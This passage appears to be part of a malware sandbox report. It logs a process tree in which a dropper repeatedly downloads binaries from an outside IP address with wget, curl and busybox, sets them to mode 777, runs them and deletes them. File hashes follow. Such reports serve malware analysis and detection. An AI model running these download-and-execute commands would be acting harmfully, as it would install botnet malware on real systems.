/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1654
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1657
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1660
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1663
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1666
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1669
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1670
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Writes file to tmp directory
PID:1671
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1672
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1675
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1676
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Writes file to tmp directory
PID:1677
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1678
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:1679
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:1680
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1681
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97